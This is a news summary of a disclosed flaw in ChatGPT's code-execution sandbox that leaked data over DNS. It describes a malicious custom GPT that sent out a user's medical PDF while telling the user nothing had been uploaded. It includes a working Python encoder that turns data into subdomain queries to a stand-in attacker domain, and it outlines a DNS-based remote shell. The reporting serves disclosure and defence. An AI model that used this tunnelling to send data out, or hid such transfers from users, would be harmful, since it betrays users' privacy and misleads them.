Check Point Research disclosed that ChatGPT’s Linux-based secure code execution runtime leaked sensitive data via DNS resolution: attackers could exfiltrate encoded data fragments through ordinary DNS queries and even establish a bidirectional remote shell via DNS tunneling. OpenAI deployed a full fix on February 20, 2026, but researchers warn that evolving assistant capabilities expand the attack surface, requiring strict control of all outbound infrastructure channels. #DNS_Tunneling #ChatGPT
Key Points
- Check Point Research discovered a hidden outbound data path in ChatGPT’s code execution environment that used DNS resolution to leak data.
- Attackers encoded sensitive data into subdomain labels and exfiltrated it through normal DNS queries to a malicious resolver.
- The DNS tunnel supported bidirectional control, enabling an attacker to spawn a remote shell inside the Linux runtime.
- A proof-of-concept “personal doctor” GPT leaked a user’s lab-results PDF along with the model’s assessment of it, even as the assistant told the user no external upload had occurred.
- OpenAI fixed the vulnerability on February 20, 2026, but researchers caution that similar infrastructure-layer channels remain a continuing risk.
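The encoding step described above can be sketched in a few lines. This is a minimal, illustrative example, not the researchers’ actual payload: the domain `exfil.example.com`, the label-packing scheme, and the `encode_chunks` helper are all hypothetical. It shows the general DNS-tunneling idea of splitting data into base32 labels (DNS names are case-insensitive and labels are capped at 63 bytes per RFC 1035), so that merely resolving each name leaks the fragments to whoever runs the authoritative server for the attacker’s domain.

```python
import base64

MAX_LABEL = 63  # RFC 1035 limit on a single DNS label


def encode_chunks(data: bytes, domain: str) -> list[str]:
    """Split data into DNS-safe base32 labels and build query names.

    Hypothetical sketch of the technique, not the PoC's actual code.
    """
    # base32 keeps the payload within the DNS hostname character set;
    # padding is stripped and case lowered since DNS is case-insensitive.
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]

    # Tag each query with a sequence number so the attacker-side
    # resolver can reassemble the fragments in order.
    per_query = 3  # keep the full name under the 253-byte FQDN limit
    names = []
    for seq, start in enumerate(range(0, len(labels), per_query)):
        parts = labels[start:start + per_query]
        names.append(f"{seq}." + ".".join(parts) + f".{domain}")
    return names


# Resolving each name (e.g. via socket.getaddrinfo) from inside the
# sandbox would deliver the fragments to the attacker's nameserver:
queries = encode_chunks(b"patient lab results ...", "exfil.example.com")
```

The bidirectional channel works the same way in reverse: the malicious resolver encodes commands into its DNS responses (for example, TXT records), which is what let the researchers escalate the leak into a remote shell inside the runtime.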
Read More: https://securityonline.info/chatgpt-dns-tunneling-vulnerability-data-exfiltration/